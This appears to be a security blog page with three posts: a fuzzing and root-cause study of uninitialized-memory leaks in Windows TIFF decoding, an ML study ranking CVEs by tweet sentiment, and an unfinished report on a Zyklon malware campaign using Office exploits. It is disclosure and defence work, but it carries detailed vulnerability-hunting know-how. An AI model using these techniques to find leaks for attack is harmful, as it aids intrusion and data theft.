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Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory

Continuing our discussion of image parsing vulnerabilities in Windows, we take a look at a comparatively less popular vulnerability class: uninitialized memory. In this post, we will look at Windows’ inbuilt image parsers—specifically for vulnerabilities involving the use of uninitialized memory.

The Vulnerability: Uninitialized Memory

In unmanaged languages, such as C or C++, variables are not initialized by default. Using uninitialized variables causes undefined behavior and may cause a crash. There are roughly two variants of uninitialized memory:

  • Direct uninitialized memory usage: An uninitialized pointer or an index is used in read or write. This may cause a crash.
  • Information leakage (info leak) through usage of uninitialized memory: Uninitialized memory content is accessible across a security boundary. An example: an uninitialized kernel buffer accessible from user mode, leading to information disclosure.

In this post we will be looking closely at the second variant in Windows image parsers, which will lead to information disclosure in situations such as web browsers where an attacker can read the decoded image back using JavaScript.

Detecting Uninitialized Memory Vulnerabilities

Compared to memory corruption vulnerabilities such as heap overflow and use-after-free, uninitialized memory vulnerabilities on their own do not access memory out of bound or out of scope. This makes detection of these vulnerabilities slightly more complicated than memory corruption vulnerabilities. While direct uninitialized memory usage can cause a crash and can be detected, information leakage doesn’t usually cause any crashes. Detecting it requires compiler instrumentations such as MemorySanitizer or binary instrumentation/recompilation tools such as Valgrind.

Detour: Detecting Uninitialized Memory in Linux

Let's take a little detour and look at detecting uninitialized memory in Linux and compare with Windows’ built-in capabilities. Even though compilers warn about some uninitialized variables, most of the complicated cases of uninitialized memory usage are not detected at compile time. For this, we can use a run-time detection mechanism. MemorySanitizer is a compiler instrumentation for both GCC and Clang, which detects uninitialized memory reads. A sample of how it works is given in Figure 1.

$ cat
#include <stdio.h>

int main()
    int *arr = new int[10];
    if(arr[3] == 0)
    printf("%08x\n", arr[3]);
    return 0;

$ clang++ -fsanitize=memory -fno-omit-frame-pointer -g

$ ./a.out
==29745==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x496db8  (/home/dan/uni/a.out+0x496db8)
    #1 0x7f463c5f1bf6  (/lib/x86_64-linux-gnu/
    #2 0x41ad69  (/home/dan/uni/a.out+0x41ad69)

SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/dan/uni/a.out+0x496db8)

Figure 1: MemorySanitizer detection of uninitialized memory

Similarly, Valgrind can also be used to detect uninitialized memory during run-time.

Detecting Uninitialized Memory in Windows

Compared to Linux, Windows lacks any built-in mechanism for detecting uninitialized memory usage. While Visual Studio and Clang-cl recently introduced AddressSanitizer support, MemorySanitizer and other sanitizers are not implemented as of this writing.

Some of the useful tools in Windows to detect memory corruption vulnerabilities such as PageHeap do not help in detecting uninitialized memory. On the contrary, PageHeap fills the memory allocations with patterns, which essentially makes them initialized.

There are few third-party tools, including Dr.Memory, that use binary instrumentation to detect memory safety issues such as heap overflows, uninitialized memory usages, use-after-frees, and others.

Detecting Uninitialized Memory in Image Decoding

Detecting uninitialized memory in Windows usually requires binary instrumentation, especially when we do not have access to source code. One of the indicators we can use to detect uninitialized memory usage, specifically in the case of image decoding, is the resulting pixels after the image is decoded.

When an image is decoded, it results in a set of raw pixels. If image decoding uses any uninitialized memory, some or all of the pixels may end up as random. In simpler words, decoding an image multiple times may result in different output each time if uninitialized memory is used. This difference of output can be used to detect uninitialized memory and aid writing a fuzzing harness targeting Windows image decoders. An example fuzzing harness is presented in Figure 2.

#define ROUNDS 20

unsigned char* DecodeImage(char *imagePath)
      unsigned char *pixels = NULL;     

      // use GDI or WIC to decode image and get the resulting pixels

      return pixels;

void Fuzz(char *imagePath)
      unsigned char *refPixels = DecodeImage(imagePath);     

      if(refPixels != NULL)
            for(int i = 0; i < ROUNDS; i++)
                  unsigned char *currPixels = DecodeImage(imagePath);
                  if(!ComparePixels(refPixels, currPixels))
                        // the reference pixels and current pixels don't match
                        // crash now to let the fuzzer know of this file

Figure 2: Diff harness

The idea behind this fuzzing harness is not entirely new; previously, lcamtuf used a similar idea to detect uninitialized memory in open-source image parsers and used a web page to display the pixel differences.


With the diffing harness ready, one can proceed to look for the supported image formats and gather corpuses. Gathering image files for corpus is considerably easy given the near unlimited availability on the internet, but at the same time it is harder to find good corpuses among millions of files with unique code coverage. Code coverage information for Windows image parsing is tracked from WindowsCodecs.dll.

Note that unlike regular Windows fuzzing, we will not be enabling PageHeap this time as PageHeap “initializes” the heap allocations with patterns.


During my research, I found three cases of uninitialized memory usage while fuzzing Windows built-in image parsers. Two of them are explained in detail in the next sections. Root cause analysis of uninitialized memory usage is non-trivial. We don’t have a crash location to back trace, and have to use the resulting pixel buffer to back trace to find the root cause—or use clever tricks to find the deviation.


Let’s look at the rendering of the proof of concept (PoC) file before going into the root cause of this vulnerability. For this we will use lcamtuf’s HTML, which loads the PoC image multiple times and compares the pixels with reference pixels.

Figure 3: CVE-2020-0853

As we can see from the resulting images (Figure 3), the output varies drastically in each decoding and we can assume this PoC leaks a lot of uninitialized memory.

To identify the root cause of these vulnerabilities, I used Time Travel Debugging (TTD) extensively. Tracing back the execution and keeping track of the memory address is a tedious task, but TTD makes it only slightly less painful by keeping the addresses and values constant and providing unlimited forward and backward executions. 

After spending quite a bit of time debugging the trace, I found the source of uninitialized memory in windowscodecs!CFormatConverter::Initialize. Even though the source was found, it was not initially clear why this memory ends up in the calculation of pixels without getting overwritten at all. To solve this mystery, additional debugging was done by comparing PoC execution trace against a normal TIFF file decoding. The following section shows the allocation, copying of uninitialized value to pixel calculation and the actual root cause of the vulnerability.

Allocation and Use of Uninitialized Memory

windowscodecs!CFormatConverter::Initialize allocates 0x40 bytes of memory, as shown in Figure 4.

0:000> r
rax=0000000000000000 rbx=0000000000000040 rcx=0000000000000040
rdx=0000000000000008 rsi=000002257a3db448 rdi=0000000000000000
rip=00007ffaf047a238 rsp=000000ad23f6f7c0 rbp=000000ad23f6f841
 r8=000000ad23f6f890  r9=0000000000000010 r10=000002257a3db468
r11=000000ad23f6f940 r12=000000000000000e r13=000002257a3db040
r14=000002257a3dbf60 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
00007ffa`f047a238 ff15ea081200    call    qword ptr [windowscodecs!_imp_malloc (00007ffa`f059ab28)] ds:00007ffa`f059ab28={msvcrt!malloc (00007ffa`f70e9d30)}
0:000> k
 # Child-SP          RetAddr               Call Site
00 000000ad`23f6f7c0 00007ffa`f047c5fb     windowscodecs!CFormatConverter::Initialize+0x1c8
01 000000ad`23f6f890 00007ffa`f047c2f3     windowscodecs!CFormatConverter::Initialize+0x12b
02 000000ad`23f6f980 00007ff6`34ca6dff     windowscodecs!CFormatConverterResolver::Initialize+0x273

//Uninitialized memory after allocation:
0:000> db @rax
00000225`7a3dbf70  d0 b0 3d 7a 25 02 00 00-60 24 3d 7a 25 02 00 00  ..=z%...`$=z%...
00000225`7a3dbf80  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbf90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfb0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfc0  00 00 00 00 00 00 00 00-64 51 7c 26 c3 2c 01 03  ........dQ|&.,..
00000225`7a3dbfd0  f0 00 2f 6b 25 02 00 00-f0 00 2f 6b 25 02 00 00  ../k%...../k%...
00000225`7a3dbfe0  60 00 3d 7a 25 02 00 00-60 00 3d 7a 25 02 00 00  `.=z%...`.=z%...

Figure 4: Allocation of memory

The memory never gets written and the uninitialized values are inverted in windowscodecs!CLibTiffDecoderBase::HrProcessCopy and further processed in windowscodecs!GammaConvert_16bppGrayInt_128bppRGBA and in later called scaling functions.

As there is no read or write into uninitialized memory before HrProcessCopy, I traced the execution back from HrProcessCopy and compared the execution traces with a normal tiff decoding trace. A difference was found in the way windowscodecs!CLibTiffDecoderBase::UnpackLine behaved with the PoC file compared to a normal TIFF file, and one of the function parameters in UnpackLine was a pointer to the uninitialized buffer.

The UnpackLine function has a series of switch-case statements working with bits per sample (BPS) of TIFF images. In our PoC TIFF file, the BPS value is 0x09—which is not supported by UnpackLine—and the control flow never reaches a code path that writes to the buffer. This is the root cause of the uninitialized memory, which gets processed further down the pipeline and finally shown as pixel data.


After presenting my analysis to Microsoft, they decided to patch the vulnerability by making the files with unsupported BPS values as invalid. This avoids all decoding and rejects the file in the very early phase of its loading.


Figure 5: Rendering of CVE-2020-1397

Unlike the previous vulnerability, the difference in the output is quite limited in this one, as seen in Figure 5. One of the simpler root cause analysis techniques that can be used to figure out a specific type of uninitialized memory usage is comparing execution traces of runs that produce two different outputs. This specific technique can be helpful when an uninitialized variable causes a control flow change in the program and that causes a difference in the outputs. For this, a binary instrumentation script was written, which logged all the instructions executed along with its registers and accessed memory values.

Diffing two distinct execution traces by comparing the instruction pointer (RIP) value, I found a control flow change in windowscodecs!CCCITT::Expand2DLine due to a usage of an uninitialized value. Back tracing the uninitialized value using TTD trace was exceptionally useful for finding the root cause. The following section shows the allocation, population and use of the uninitialized value, which leads to the control flow change and deviance in the pixel outputs.


windowscodecs!TIFFReadBufferSetup allocates 0x400 bytes of memory, as shown in Figure 6.

    allocBuff = malloc(size);
    *(v3 + 16) |= 0x200u;
    *(v3 + 480) = allocBuff;

0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d4f3 windowscodecs!TIFFReadBufferSetup
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0xab
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5


After allocation:
0:000> !heap -p -a @rax
    address 0000029744382140 found in
    _HEAP @ 29735190000
              HEAP_ENTRY Size Prev Flags            UserPtr UserSize - state
        0000029744382130 0041 0000  [00]   0000029744382140    00400 - (busy)

//Uninitialized memory after allocation        
0:000> db @rax
00000297`44382140  40 7c 5e 97 29 5d 5f ae-73 31 98 70 b8 4f da ac  @|^.)]_.s1.p.O..
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 6: Allocation of memory

Partially Populating the Buffer

0x10 bytes are copied from the input file to this allocated buffer by TIFFReadRawStrip1. The rest of the buffer remains uninitialized with random values, as shown in Figure 7.

if ( !TIFFReadBufferSetup(v2, a2, stripCount) ) {
      return 0i64;
if ( TIFFReadRawStrip1(v2, v3, sizeToReadFromFile, "TIFFFillStrip") != sizeToReadFromFile )


0:000> r
rax=0000000000000001 rbx=000002973519a7e0 rcx=000002973519a7e0
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000010
rip=00007ff94404d58c rsp=000000aaa654f128 rbp=0000000000000000
 r8=0000000000000010  r9=00007ff94416fc38 r10=0000000000000000
r11=000000aaa654ef60 r12=0000000000000001 r13=0000000000000000
r14=0000029744377de0 r15=0000000000000001
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
00007ff9`4404d58c 488bc4          mov     rax,rsp
0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f128 00007ff9`4404d491 windowscodecs!TIFFReadRawStrip1
01 000000aa`a654f130 00007ff9`4404d3c9 windowscodecs!TIFFFillStrip+0x49
02 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0x91
03 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
04 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
05 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
06 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
07 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
08 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
09 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.

Figure 7: Partial population of memory

Use of Uninitialized Memory

0:000> r
rax=0000000000000006 rbx=0000000000000007 rcx=0000000000000200
rdx=0000000000011803 rsi=0000029744382150 rdi=0000000000000000
rip=00007ff94414e837 rsp=000000aaa654f050 rbp=0000000000000001
 r8=0000029744382550  r9=0000000000000000 r10=0000000000000008
r11=0000000000000013 r12=00007ff94418b7b0 r13=0000000000000003
r14=0000000023006c00 r15=00007ff94418bbb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
00007ff9`4414e837 0fb606          movzx   eax,byte ptr [rsi] ds:00000297`44382150=06             ; Uninitialized memory being accessed


0:000> db 00000297`44382140
00000297`44382140  5b cd 82 55 2a 94 e2 6f-d7 2d a5 93 58 23 00 6c  [..U*..o.-..X#.l             // 0x10 bytes from file
00000297`44382150  06 51 54 18 2e 2a 23 3a-4f ab 14 27 e9 c6 2c 83  .QT..*#:O..'..,.             // uninitialized memory
00000297`44382160  3a 25 b2 f6 9d e7 3c 09-cc a5 8e 27 b0 73 41 a9  :%....<....'.sA.
00000297`44382170  fb 9b 02 b5 81 3e ea 45-4c 0f ab a7 72 e3 21 e7  .....>.EL...r.!.
00000297`44382180  c8 44 84 3b c3 b5 44 8a-c9 6e 4b 2e 40 31 38 e0  .D.;..D..nK.@18.
00000297`44382190  85 f0 bd 98 3b 0b ca b8-78 b1 9d d0 dd 4d 61 66  ....;...x....Maf
00000297`443821a0  16 7d 0a e2 40 fa f8 45-4f 79 ab 95 d8 54 f9 44  .}[email protected]
00000297`443821b0  66 26 28 00 b7 96 52 88-15 f0 ed 34 94 5f 6f 94  f&(...R....4._o.


0:000> k
 # Child-SP          RetAddr           Call Site
00 000000aa`a654f050 00007ff9`4414df80 windowscodecs!CCCITT::Expand2DLine+0x253
01 000000aa`a654f0d0 00007ff9`4412afcc windowscodecs!CCCITT::CCITT_Expand+0xac
02 000000aa`a654f120 00007ff9`4404d3f0 windowscodecs!CCITTDecode+0x7c
03 000000aa`a654f170 00007ff9`4404d2dc windowscodecs!TIFFReadEncodedStrip+0xb8
04 000000aa`a654f1b0 00007ff9`440396dd windowscodecs!CLibTiffDecoderBase::ReadStrip+0x74
05 000000aa`a654f1e0 00007ff9`44115fca windowscodecs!CLibTiffDecoderBase::GetOneUnpackedLine+0x1ad
06 000000aa`a654f2b0 00007ff9`44077400 windowscodecs!CLibTiffDecoderBase::HrProcessCopy+0x4a
07 000000aa`a654f2f0 00007ff9`44048dbb windowscodecs!CLibTiffDecoderBase::HrReadScanline+0x20
08 000000aa`a654f320 00007ff9`44048b40 windowscodecs!CDecoderBase::CopyPixels+0x23b
09 000000aa`a654f3d0 00007ff9`44043c95 windowscodecs!CLibTiffDecoderBase::CopyPixels+0x80
0a 000000aa`a654f4d0 00007ff9`4404563b windowscodecs!CDecoderFrame::CopyPixels+0xb5

Figure 8: Reading of uninitialized value

Depending on the uninitialized value (Figure 8), different code paths are taken in Expand2DLine, which will change the output pixels, as shown in Figure 9.

        if ( v11 != 1 || a2 )
            unintValue = *++allocBuffer | (unintValue << 8);          // uninit mem read
            unintValue <<= 8;
        v16 += 8;
      v29 = unintValue >> (v16 - 8);
      dependentUninitValue = *(l + 2i64 * v29);                           
      v16 -= *(l + 2i64 * v29 + 1);
      if ( dependentUninitValue >= 0 )             // path 1
      if ( dependentUninitValue < '\xC0' )
        return 0xFFFFFFFFi64;                     // path 2
  if ( dependentUninitValue <= 0x3F )              // path xx

Figure 9: Use of uninitialized memory in if conditions


Microsoft decided to patch this vulnerability by using calloc instead of malloc, which initializes the allocated memory with zeros.


Part Two of this blog series presents multiple vulnerabilities in Windows’ built-in image parsers. In the next post, we will explore newer supported image formats in Windows such as RAW, HEIF and more.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities


If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue. ­

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.

Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.

Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.

Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.

Figure 4: Tweet showing strong adjective use

Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.

Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.

Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model


Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign


FireEye researchers recently observed threat actors leveraging relatively new vulnerabilities in Microsoft Office to spread Zyklon HTTP malware. Zyklon has been observed in the wild since early 2016 and provides myriad sophisticated capabilities.

Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software. Zyklon also provides a very efficient mechanism to monitor the spread and impact.

Infection Vector

We have observed this recent wave of Zyklon malware being delivered primarily through spam emails. The email typically arrives with an attached ZIP file containing a malicious DOC file (Figure 1 shows a sample lure).

The following industries have been the primary targets in this campaign:

  • Telecommunications
  • Insurance
  • Financial Services

Figure 1: Sample lure documents

Attack Flow

  1. Spam email arrives in the victim’s mailbox as a ZIP attachment, which contains a malicious DOC file.
  2. The document files exploit at least three known vulnerabilities in Microsoft Office, which we discuss in the Infection Techniques section. Upon execution in a vulnerable environment, the PowerShell based payload takes over.
  3. The PowerShell script is responsible for downloading the final payload from C2 server to execute it.

A visual representation of the attack flow and execution chain can be seen in Figure 2.

Figure 2: Zyklon attack flow

Infection Techniques


This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild.

The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3).

Figure 3: Embedded URL in OLE object


Similarly, we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office. Upon opening the malicious DOC attachment, an additional download is triggered from a stored URL within an embedded OLE Object (seen in Figure 4).

Figure 4: Embedded URL in OLE object

Figure 5: HTTP GET request to download the next level payload

